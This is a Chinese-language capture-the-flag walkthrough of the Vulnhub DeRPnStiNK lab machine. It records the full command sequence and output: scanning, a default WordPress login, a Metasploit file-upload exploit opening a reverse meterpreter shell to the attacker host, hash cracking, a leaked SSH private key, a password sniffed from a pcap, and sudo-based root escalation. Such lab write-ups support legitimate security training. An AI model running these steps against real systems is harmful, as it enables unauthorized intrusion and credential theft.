Vulnhub-DeRPnStiNK靶场渗透
找到全部四个flag。
目标发现
因为在同一子网,所以使用 arp-scan 进行扫描,发现目标
┌──(root㉿kali)-[/home/kali]
└─# arp-scan 192.168.120.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ab:50:b1, IPv4: 192.168.120.160
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.120.1 00:50:56:c0:00:08 (Unknown)
192.168.120.2 00:50:56:f6:91:bf (Unknown)
192.168.120.171 00:0c:29:fc:47:76 (Unknown)
192.168.120.254 00:50:56:eb:fd:ce (Unknown)
6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.883 seconds (135.95 hosts/sec). 4 responded
可以得到目标ip为:192.168.120.171
信息搜集
端口扫描
开放端口扫描
┌──(root㉿kali)-[/home/kali]
└─# nmap -sS -p- 192.168.120.171 --min-rate=10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-06 05:23 EDT
Nmap scan report for 192.168.120.171
Host is up (0.0018s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:FC:47:76 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 5.40 seconds
开放端口服务扫描
┌──(root㉿kali)-[/home/kali]
└─# nmap -A -sT -p21,22,80 192.168.120.171
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-06 05:26 EDT
Nmap scan report for 192.168.120.171
Host is up (0.00052s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
| 2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
| 256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_ 256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/php/ /temporary/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
MAC Address: 00:0C:29:FC:47:76 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.52 ms 192.168.120.171
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.95 seconds
综上,可以得到以下信息:
- 开放21/ftp服务,没有匿名登录
- 开放22/ssh服务
- 开放80/http服务,中间件为apache
目录扫描
对目标站点进行目录扫描
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://192.168.120.171 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,js,asp,aspx,jsp,bak,swp,config,env,json,log,git -t 100 -b 404,400
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.120.171
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404,400
[+] User Agent: gobuster/3.6
[+] Extensions: git,txt,js,jsp,config,env,json,log,php,html,asp,aspx,bak,swp
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/weblog (Status: 301) [Size: 318] [--> http://192.168.120.171/weblog/]
/.html (Status: 403) [Size: 287]
/php (Status: 301) [Size: 315] [--> http://192.168.120.171/php/]
/index.html (Status: 200) [Size: 1298]
/.php (Status: 403) [Size: 286]
/css (Status: 301) [Size: 315] [--> http://192.168.120.171/css/]
/js (Status: 301) [Size: 314] [--> http://192.168.120.171/js/]
/javascript (Status: 301) [Size: 322] [--> http://192.168.120.171/javascript/]
/robots.txt (Status: 200) [Size: 53]
/.html (Status: 403) [Size: 287]
/.php (Status: 403) [Size: 286]
/temporary (Status: 301) [Size: 321] [--> http://192.168.120.171/temporary/]
/server-status (Status: 403) [Size: 295]
Progress: 3308400 / 3308415 (100.00%)
===============================================================
Finished
===============================================================
得到了几个有效页面的路径,访问查看是否有有用信息。
-
/index.html
源码中发现了第一个flag
PS:这里也可以使用curl获得源码
-
/robots.txt
-
/temporary
通过curl获取默认页的时候,可以看到其中泄露了一些路径:
-
/webnotes/info.txt
得到了以下信息:
-
一个名称:stinky
-
一个更新dns,才能访问博客的提示:<-- @stinky,确保用本地DNS更新您的hosts文件,以便新的 derpnstink 博客可以在它上线之前到达 -->
-
/weblog
访问的时候,自动跳转到了一个路径:http://derpnstink.local/weblog/,那么应该是在hosts中添加:
192.168.120.171 derpnstink.local -
/php/phpmyadmin/
发现是mysql登录页:
二次目录扫描
在 http://derpnstink.local/weblog/ 站点进行二次目录扫描
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u http://derpnstink.local/weblog/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt,js,asp,aspx,jsp,bak,swp,config,env,json,log,git -t 100 -b 404,400
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://derpnstink.local/weblog/
[+] Method: GET
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404,400
[+] User Agent: gobuster/3.6
[+] Extensions: env,log,html,txt,jsp,config,json,git,php,js,asp,aspx,bak,swp
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/wp-content (Status: 301) [Size: 329] [--> http://192.168.120.171/weblog/wp-content/]
/index.php (Status: 200) [Size: 14674]
/.php (Status: 403) [Size: 293]
/.html (Status: 403) [Size: 294]
/license.txt (Status: 200) [Size: 19935]
/wp-includes (Status: 301) [Size: 330] [--> http://192.168.120.171/weblog/wp-includes/]
/wp-login.php (Status: 200) [Size: 2721]
/readme.html (Status: 200) [Size: 7322]
/wp-admin (Status: 301) [Size: 327] [--> http://192.168.120.171/weblog/wp-admin/]
/xmlrpc.php (Status: 405) [Size: 42]
/.html (Status: 403) [Size: 294]
/.php (Status: 403) [Size: 293]
/wp-signup.php (Status: 302) [Size: 0] [--> http://derpnstink.local/weblog/wp-login.php?action=register]
Progress: 3308400 / 3308415 (100.00%)
===============================================================
Finished
===============================================================
经过尝试,在 /readme.html 页面发现说默认密码是admin:
在 /wp-login.php 登录页面使用 admin:admin 成功登录:
而且识别到了cms信息:
由于是wordpress,所以可以使用wpscan扫描其组件可能存在的漏洞
wpscan扫描漏洞
在wpscan站点获取api后,使用wpscan工具进行扫描:
wpscan --url 'http://derpnstink.local/weblog/' --api-token '7JsD……GC0Q' > result.txt
发现大量组件漏洞:
利用其中的一个文件上传漏洞:
| [!] Title: Slideshow Gallery < 1.4.7 - Arbitrary File Upload
| Fixed in: 1.4.7
| References:
| - https://wpscan.com/vulnerability/b1b5f1ba-267d-4b34-b012-7a047b1d77b2
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5460
| - https://www.exploit-db.com/exploits/34681/
| - https://www.exploit-db.com/exploits/34514/
| - https://seclists.org/bugtraq/2014/Sep/1
| - https://packetstormsecurity.com/files/131526/
| - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_slideshowgallery_upload/
shell获取
在msf中搜索 CVE-2014-5460,根据要求设置后利用:
msf6 > search CVE-2014-5460
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/wp_slideshowgallery_upload 2014-08-28 excellent Yes Wordpress SlideShow Gallery Authenticated File Upload
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/webapp/wp_slideshowgallery_upload
msf6 > use 0
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > show options
Module options (exploit/unix/webapp/wp_slideshowgallery_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasplo
it.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
VHOST no HTTP server virtual host
WP_PASSWORD yes Valid password for the provided username
WP_USER yes A valid username
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.120.160 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 WP SlideShow Gallery 1.4.6
View the full module info with the info, or info -d command.
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set rhosts 192.168.120.171
rhosts => 192.168.120.171
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set wp_user admin
wp_user => admin
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set wp_password admin
wp_password => admin
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set vhost derpnstink.local
vhost => derpnstink.local
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > set targeturi /weblog/
targeturi => /weblog/
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > show options
Module options (exploit/unix/webapp/wp_slideshowgallery_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.120.171 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metaspl
oit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /weblog/ yes The base path to the wordpress application
VHOST derpnstink.local no HTTP server virtual host
WP_PASSWORD admin yes Valid password for the provided username
WP_USER admin yes A valid username
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.120.160 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 WP SlideShow Gallery 1.4.6
View the full module info with the info, or info -d command.
msf6 exploit(unix/webapp/wp_slideshowgallery_upload) > run
[*] Started reverse TCP handler on 192.168.120.160:4444
[*] Trying to login as admin
[*] Trying to upload payload
[*] Uploading payload
[*] Calling uploaded file lythtccp.php
[*] Sending stage (40004 bytes) to 192.168.120.171
[+] Deleted lythtccp.php
[*] Meterpreter session 1 opened (192.168.120.160:4444 -> 192.168.120.171:34882) at 2025-04-06 07:11:54 -0400
meterpreter > shell
Process 2680 created.
Channel 0 created.
python -c 'import pty;pty.spawn("/bin/bash")'
</html/weblog/wp-content/uploads/slideshow-gallery$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
成功拿到shell~
查看 /home 目录下的用户:
www-data@DeRPnStiNK:/var/www/html/weblog$ ls /home
ls /home
mrderp stinky
发现两个用户
sql信息搜集
在网站目录下翻到了一个配置文件:
在其中发现了数据库的配置信息,包括root用户的登录凭证:
成功登录:
udf提权条件验证
经过尝试,发现无法对目标进行内核提权,由于当前有mysql的root用户凭据,尝试看看能不能进行udf提权
1、是root权限的mysql
2、secure_file_priv 是否有具体值/不为null:
# 查询secure_file_priv
mysql> show global variables like 'secure%';
show global variables like 'secure%';
+------------------+-----------------------+
| Variable_name | Value |
+------------------+-----------------------+
| secure_auth | OFF |
| secure_file_priv | /var/lib/mysql-files/ |
+------------------+-----------------------+
2 rows in set (0.31 sec)
查看发现不可以任意上传下载文件,只能在指定目录下上传下载文件,不可以使用udf
3、查看插件目录:
mysql> show variables like '%plugin%';
show variables like '%plugin%';
+---------------+------------------------+
| Variable_name | Value |
+---------------+------------------------+
| plugin_dir | /usr/lib/mysql/plugin/ |
+---------------+------------------------+
1 row in set (0.00 sec)
4、查看是否可以远程登录:
mysql> use mysql;
Database changed
mysql> use mysql;
select user,host from user;select user,host from user;use mysql;
+------------------+------------------+
| user | host |
+------------------+------------------+
| root | 127.0.0.1 |
| root | ::1 |
| root | derpnstink |
| unclestinky | derpnstink.local |
| debian-sys-maint | localhost |
| phpmyadmin | localhost |
| root | localhost |
+------------------+------------------+
7 rows in set (0.00 sec)
Database changed
发现不能使用远程登录,那就不能进行MSF提权;
回到前面信息搜集时找到的数据库登录页面,使用得到的登录凭据登录:
在wb_users表中发现了另一个用户 unclestinky 和密码hash:$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
使用john进行爆破:
┌──(root㉿kali)-[/home/kali/Templates]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt 1.hash
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
wedgie57 (?)
1g 0:00:02:56 DONE (2025-04-06 09:01) 0.005657g/s 15818p/s 15818c/s 15818C/s wedner12..wederliy1997
Use the "--show --format=phpass" options to display all of the cracked passwords reliably
Session completed.
得到一个账户凭证:unclestinky:wedgie57
使用这个账户登录平台,发现了一个flag2:
登录ssh
尝试登录ssh,但发现ssh不支持密码密码登陆:
ftp登录
使用前面发现的两个用户和前面得到的一个密码尝试ftp登录:
┌──(root㉿kali)-[/home/kali/Templates]
└─# ftp 192.168.120.171
Connected to 192.168.120.171.
220 (vsFTPd 3.0.2)
Name (192.168.120.171:kali): mrderp
530 Permission denied.
ftp: Login failed
ftp> quit
221 Goodbye.
┌──(root㉿kali)-[/home/kali/Templates]
└─# ftp 192.168.120.171
Connected to 192.168.120.171.
220 (vsFTPd 3.0.2)
Name (192.168.120.171:kali): stinky
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||46863|).
150 Here comes the directory listing.
drwxr-xr-x 5 1001 1001 4096 Nov 12 2017 files
226 Directory send OK.
ftp> quit
221 Goodbye.
有一个用户成功登录,发现有一些文件:
ftp> ls
229 Entering Extended Passive Mode (|||47277|).
150 Here comes the directory listing.
drwxr-xr-x 2 1001 1001 4096 Nov 12 2017 network-logs
drwxr-xr-x 3 1001 1001 4096 Nov 12 2017 ssh
-rwxr-xr-x 1 0 0 17 Nov 12 2017 test.txt
drwxr-xr-x 2 0 0 4096 Nov 12 2017 tmp
226 Directory send OK.
ftp> get test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||44009|).
150 Opening BINARY mode data connection for test.txt (17 bytes).
100% |***********************************************************************************************| 17 0.03 KiB/s 00:00 ETA
226 Transfer complete.
17 bytes received in 00:00 (0.03 KiB/s)
ftp> cd ssh
250 Directory successfully changed.
ftp> cd ssh
250 Directory successfully changed.
ftp> cd ssh
250 Directory successfully changed.
ftp> cd ssh
250 Directory successfully changed.
ftp> cd ssh
250 Directory successfully changed.
ftp> cd ssh
250 Directory successfully changed.
ftp> cd ssh
250 Directory successfully changed.
ftp> cd ssh
550 Failed to change directory.
ftp> pwd
Remote directory: /files/ssh/ssh/ssh/ssh/ssh/ssh/ssh
ftp> ls
229 Entering Extended Passive Mode (|||44034|).
150 Here comes the directory listing.
-rwxr-xr-x 1 0 0 1675 Nov 13 2017 key.txt
226 Directory send OK.
ftp> get key.txt
local: key.txt remote: key.txt
229 Entering Extended Passive Mode (|||41298|).
150 Opening BINARY mode data connection for key.txt (1675 bytes).
100% |***********************************************************************************************| 1675 49.96 KiB/s 00:00 ETA
226 Transfer complete.
1675 bytes received in 00:00 (48.40 KiB/s)
ftp> cd network-logs
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||48682|).
150 Here comes the directory listing.
-rwxr-xr-x 1 0 0 719 Nov 12 2017 derpissues.txt
226 Directory send OK.
ftp> get derpissues.txt
local: derpissues.txt remote: derpissues.txt
229 Entering Extended Passive Mode (|||42449|).
150 Opening BINARY mode data connection for derpissues.txt (719 bytes).
100% |***********************************************************************************************| 719 53.00 KiB/s 00:00 ETA
226 Transfer complete.
719 bytes received in 00:00 (48.92 KiB/s)
ftp> quit
221 Goodbye.
test.txt文件没有什么有效信息;kay.txt文件中是一个私钥文件,可以利用其进行登录; derpissues.txt文件中是一些文本信息:
┌──(root㉿kali)-[/home/kali/Templates]
└─# cat key.txt
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAwSaN1OE76mjt64fOpAbKnFyikjz4yV8qYUxki+MjiRPqtDo4
2xba3Oo78y82svuAHBm6YScUos8dHUCTMLA+ogsmoDaJFghZEtQXugP8flgSk9cO
uJzOt9ih/MPmkjzfvDL9oW2Nh1XIctVfTZ6o8ZeJI8Sxh8Eguh+dw69M+Ad0Dimn
AKDPdL7z7SeWg1BJ1q/oIAtJnv7yJz2iMbZ6xOj6/ZDE/2trrrdbSyMc5CyA09/f
5xZ9f1ofSYhiCQ+dp9CTgH/JpKmdsZ21Uus8cbeGk1WpT6B+D8zoNgRxmO3/VyVB
LHXaio3hmxshttdFp4bFc3foTTSyJobGoFX+ewIDAQABAoIBACESDdS2H8EZ6Cqc
nRfehdBR2A/72oj3/1SbdNeys0HkJBppoZR5jE2o2Uzg95ebkiq9iPjbbSAXICAD
D3CVrJOoHxvtWnloQoADynAyAIhNYhjoCIA5cPdvYwTZMeA2BgS+IkkCbeoPGPv4
ZpHuqXR8AqIaKl9ZBNZ5VVTM7fvFVl5afN5eWIZlOTDf++VSDedtR7nL2ggzacNk
Q8JCK9mF62wiIHK5Zjs1lns4Ii2kPw+qObdYoaiFnexucvkMSFD7VAdfFUECQIyq
YVbsp5tec2N4HdhK/B0V8D4+6u9OuoiDFqbdJJWLFQ55e6kspIWQxM/j6PRGQhL0
DeZCLQECgYEA9qUoeblEro6ICqvcrye0ram38XmxAhVIPM7g5QXh58YdB1D6sq6X
VGGEaLxypnUbbDnJQ92Do0AtvqCTBx4VnoMNisce++7IyfTSygbZR8LscZQ51ciu
Qkowz3yp8XMyMw+YkEV5nAw9a4puiecg79rH9WSr4A/XMwHcJ2swloECgYEAyHn7
VNG/Nrc4/yeTqfrxzDBdHm+y9nowlWL+PQim9z+j78tlWX/9P8h98gOlADEvOZvc
fh1eW0gE4DDyRBeYetBytFc0kzZbcQtd7042/oPmpbW55lzKBnnXkO3BI2bgU9Br
7QTsJlcUybZ0MVwgs+Go1Xj7PRisxMSRx8mHbvsCgYBxyLulfBz9Um/cTHDgtTab
L0LWucc5KMxMkTwbK92N6U2XBHrDV9wkZ2CIWPejZz8hbH83Ocfy1jbETJvHms9q
cxcaQMZAf2ZOFQ3xebtfacNemn0b7RrHJibicaaM5xHvkHBXjlWN8e+b3x8jq2b8
gDfjM3A/S8+Bjogb/01JAQKBgGfUvbY9eBKHrO6B+fnEre06c1ArO/5qZLVKczD7
RTazcF3m81P6dRjO52QsPQ4vay0kK3vqDA+s6lGPKDraGbAqO+5paCKCubN/1qP1
14fUmuXijCjikAPwoRQ//5MtWiwuu2cj8Ice/PZIGD/kXk+sJXyCz2TiXcD/qh1W
pF13AoGBAJG43weOx9gyy1Bo64cBtZ7iPJ9doiZ5Y6UWYNxy3/f2wZ37D99NSndz
UBtPqkw0sAptqkjKeNtLCYtHNFJAnE0/uAGoAyX+SHhas0l2IYlUlk8AttcHP1kA
a4Id4FlCiJAXl3/ayyrUghuWWA3jMW3JgZdMyhU3OV+wyZz25S8o
-----END RSA PRIVATE KEY-----
┌──(root㉿kali)-[/home/kali/Templates]
└─# cat test.txt
vsftpd test file
┌──(root㉿kali)-[/home/kali/Templates]
└─# strings derpissues.txt
12:06 mrderp: hey i cant login to wordpress anymore. Can you look into it?
12:07 stinky: yeah. did you need a password reset?
12:07 mrderp: I think i accidently deleted my account
12:07 mrderp: i just need to logon once to make a change
12:07 stinky: im gonna packet capture so we can figure out whats going on
12:07 mrderp: that seems a bit overkill, but wtv
12:08 stinky: commence the sniffer!!!!
12:08 mrderp: -_-
12:10 stinky: fine derp, i think i fixed it for you though. cany you try to login?
12:11 mrderp: awesome it works!
12:12 stinky: we really are the best sysadmins #team
12:13 mrderp: i guess we are...
12:15 mrderp: alright I made the changes, feel free to decomission my account
12:20 stinky: done! yay
PS:译文
根据前面收集到的信息,对话中的两个人正好就是目标主机 /home 目录下的用户。
使用密钥登录ssh
┌──(root㉿kali)-[/home/kali/Templates]
└─# ssh -o PubkeyAcceptedAlgorithms=+ssh-rsa -i key.txt stinky@192.168.120.171
Ubuntu 14.04.5 LTS
,~~~~~~~~~~~~~..
' Derrrrrp N `
,~~~~~~, | Stink |
/ , \ ', ________ _,"
/,~|_______\. \/
/~ (__________)
(*) ; (^)(^)':
=; ____ ;
; """" ;=
{"}_ ' '""' ' _{"}
\__/ > < \__/
\ ," ", /
\ " /"
" "=
> <
=" "-
-`. ,'
-
`--'
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)
* Documentation: https://help.ubuntu.com/
331 packages can be updated.
231 updates are security updates.
New release '16.04.7 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Mon Nov 13 00:31:29 2017 from 192.168.1.129
stinky@DeRPnStiNK:~$ id
uid=1001(stinky) gid=1001(stinky) groups=1001(stinky)
由于新版openssh不兼容旧版算法,所以强制指定使用就算法:
-o PubkeyAcceptedAlgorithms=+ssh-rsa
但登录后sudo提权等提权方式无效。
查找抓包文件
根据 derpissues.txt的信息,可以知道有一个抓包文件,使用之前的webshell用户查找抓包文件 .pcap:
stinky@DeRPnStiNK:~$ find / -type f -iname '*.pcap' 2>/dev/null
/home/stinky/Documents/derpissues.pcap
使用wireshark查看内容,根据前面derpissues.txt的对话,查找密码(pass)相关的内容:
找到了mrderp用户的登录凭证:derpderpderpderpderpderpderp
成功登入:
┌──(root㉿kali)-[/home/kali/Templates]
└─# ssh mrderp@192.168.120.171
Ubuntu 14.04.5 LTS
,~~~~~~~~~~~~~..
' Derrrrrp N `
,~~~~~~, | Stink |
/ , \ ', ________ _,"
/,~|_______\. \/
/~ (__________)
(*) ; (^)(^)':
=; ____ ;
; """" ;=
{"}_ ' '""' ' _{"}
\__/ > < \__/
\ ," ", /
\ " /"
" "=
> <
=" "-
-`. ,'
-
`--'
mrderp@192.168.120.171's password:
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)
* Documentation: https://help.ubuntu.com/
500 packages can be updated.
415 updates are security updates.
New release '16.04.7 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Mon Nov 13 01:03:13 2017 from 192.168.1.129
mrderp@DeRPnStiNK:~$ id
uid=1000(mrderp) gid=1000(mrderp) groups=1000(mrderp)
提权
mrderp@DeRPnStiNK:~$ sudo -l
[sudo] password for mrderp:
Matching Defaults entries for mrderp on DeRPnStiNK:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User mrderp may run the following commands on DeRPnStiNK:
(ALL) /home/mrderp/binaries/derpy*
意义:
(ALL):表示该用户可以以任何用户(包括root)的身份执行后面指定的命令。/home/mrderp/binaries/derpy*:表示用户mrderp可以使用sudo执行/home/mrderp/binaries/目录下所有以derpy开头的命令。
那么就可以直接在/home/mrderp/binaries/目录下创建一个derpy开头的执行文件:
mrderp@DeRPnStiNK:~$ cd /home/mrderp/
mrderp@DeRPnStiNK:~$ mkdir binaries
mrderp@DeRPnStiNK:~$ cd binaries/
mrderp@DeRPnStiNK:~/binaries$ echo '/bin/bash' > derpy.sh
mrderp@DeRPnStiNK:~/binaries$ chmod +x derpy.sh
mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy.sh
root@DeRPnStiNK:~/binaries# id
uid=0(root) gid=0(root) groups=0(root)
成功拿到 rootshell~
获取剩余flag
root@DeRPnStiNK:~/binaries# find / -type f -iname 'flag*' 2>/dev/null
/home/stinky/Desktop/flag.txt
/root/Desktop/flag.txt
/sys/devices/pci0000:00/0000:00:11.0/0000:02:01.0/net/eth0/flags
/sys/devices/virtual/net/lo/flags
root@DeRPnStiNK:~/binaries# cat /home/stinky/Desktop/flag.txt
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
root@DeRPnStiNK:/root/Desktop# cat flag.txt
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)
Congrats on rooting my first VulnOS!
Hit me up on twitter and let me know your thoughts!
@securekomodo
总结
还是要注重信息搜集,对现有信息进行整合就能够在信息中得到下一步可以从哪入手
浙公网安备 33010602011771号